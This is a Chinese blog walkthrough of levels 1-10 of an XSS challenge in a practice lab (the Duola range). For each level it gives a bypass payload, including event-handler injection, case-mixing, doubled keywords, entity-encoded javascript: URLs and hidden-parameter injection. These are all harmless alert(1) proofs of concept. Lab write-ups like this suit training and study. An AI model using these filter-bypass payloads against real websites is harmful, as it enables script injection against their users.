专栏首页黑白安全哆啦靶场XSS挑战赛1-10关攻略

哆啦靶场XSS挑战赛1-10关攻略

哆啦集成了网络上常见的靶场与GitHub上比较好的靶场系统,配合一键启动模式,省去你去收集再进行搭建的时间,方便你更加快速的学习信息安全。

该靶场已经正式开源,黑白网去除登录限制重构靶场环境,bachang.heibai.org

正文部分

XSS挑战赛第一关

F12查看了源码发现并没有任何过滤,

<script>alert(1)</script>

XSS挑战赛第二关

查看源码发现<>尖括号无法使用

框内输入

" onmouseover=alert(1)>[object Object]

或者将input文本框提前闭合

"><script>alert(1)</script>[object Object]

XSS挑战赛第三关

和第二关的区别在于代码内多了一句value='".htmlspecialchars($str)."'

无法使用尖括号,so继续使用不用尖括号的弹窗

' onmouseover=alert(1)//

在源码构成

<input name="keyword" value=" " onmouseover="alert(1)//'">

即可

XSS挑战赛第四关

htmlspecialchars+尖括号过滤

在没有尖括号并且语句不被htmlspecialchars()函数影响的情况下

输入

" onclick=alert(1) //

在点击搜索框触发XSS

XSS挑战赛第五关

strreplace 就直接把on转换成 o_n 这样就过滤了js事件但是没过滤尖括号

所以

"><a href=javascript:alert(1)>

即可

点击“>触发

XSS挑战赛第六关

script 转换成 scr_ipt on 转换成 o_n src 转换成 sr_c data 转换成 da_ta href 转换成 hr_ef

但是没有大小写约束

"> <Script>alert(1)</script> //

直接冲冲冲

XSS挑战赛第七关

禁用了大小写同时script,on,src ,data ,href 都直接转换成空。

利用双写绕过

">hello<sscriptcript>alert(1)</sscriptcript>

XSS挑战赛第八关

script 转换成 scr_ipt on 转换成 o_n src 转换成 sr_c data 转换成 da_ta href 转换成 hr_ef 大小写禁用 " 被编码,但是尖括号等符号没有被过滤,输出点在a标签内,href属性中

javascript会被替换成javasc_rpt,我们使用&#x72来代替r

键入

javascrip&#x74;:alert(1)

并点击添加后,再点击友情链接即可触发

XSS挑战赛第九关

查看源码发现不带http://即为不合法提交

javascrip&#x74;:alert(1)//http://heibai.org

键入后点击友情链接即可触发

XSS挑战赛第十关

查看源代码,有get参数有隐藏框

keyword = test&t_sort="type="text" onclick = "alert(1)

直接冲冲冲

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 快速入门xss 判断网站是否存在xss漏洞

    XSS全称跨站脚本攻击,用户浏览网页时,嵌入的Script代码被执行,从而达到攻击用户的目的,常见漏洞页面,网站搜索页面,留言板。

    周俊辉
  • DDoS防御的8种方针详解

    对于遭受DDOS攻击的情况是让人很尴尬的,如果我们有良好的DDoS防御方法,那么很多问题就将迎刃而解,我们来看看我们有哪些常用的有效地方法来做好DDoS防御呢。

    周俊辉
  • web安全之XSS

    XSS: (Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。

    周俊辉
  • 【XSS漏洞】一步步教你通关DVWA

    今天小编初步学习了一下XSS漏洞,顺带打通了DVWA平台上的几道XSS漏洞题,本着学习的精神,在此跟大家分享一下这几题的解法,感兴趣的同学就跟着我一起往下看吧。

    一名白帽的成长史
  • wwwxml400com请拨18608765024bee-box之XSS攻击

    一个月前刷了XSSchalleng以为自己已经算是入门了XSS了,但是在我挖洞碰到有可能存在XSS漏洞网页的时候,发现我只能记起来<script>alert('...

    用户7106032
  • Oracle 联机重做日志文件(ONLINE LOG FILE)

    --=========================================

    Leshami
  • XSS跨站脚本攻击

    跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSS。

    那一叶随风
  • Bwapp漏洞平台答案全解-A3(第二篇)

    前言 接上篇XSS,没啥好讲的,直接看答案吧 A3 - Cross-Site Scripting (XSS) -3.11-XSS - Reflected(ph...

    用户1467662
  • web安全之XSS实例解析

    跨站脚本攻击(Cross Site Script),本来缩写是 CSS, 但是为了和层叠样式表(Cascading Style Sheet, CSS)有所区分,...

    前端迷
  • Pikachu漏洞靶场系列之XSS

    跨站脚本攻击(Cross-Site Scripting)简称为“CSS”,为避免与前端叠成样式表的缩写”CSS”冲突,故又称XSS。一般XSS可以分为如下几种常...

    FB客服

扫码关注云+社区

领取腾讯云代金券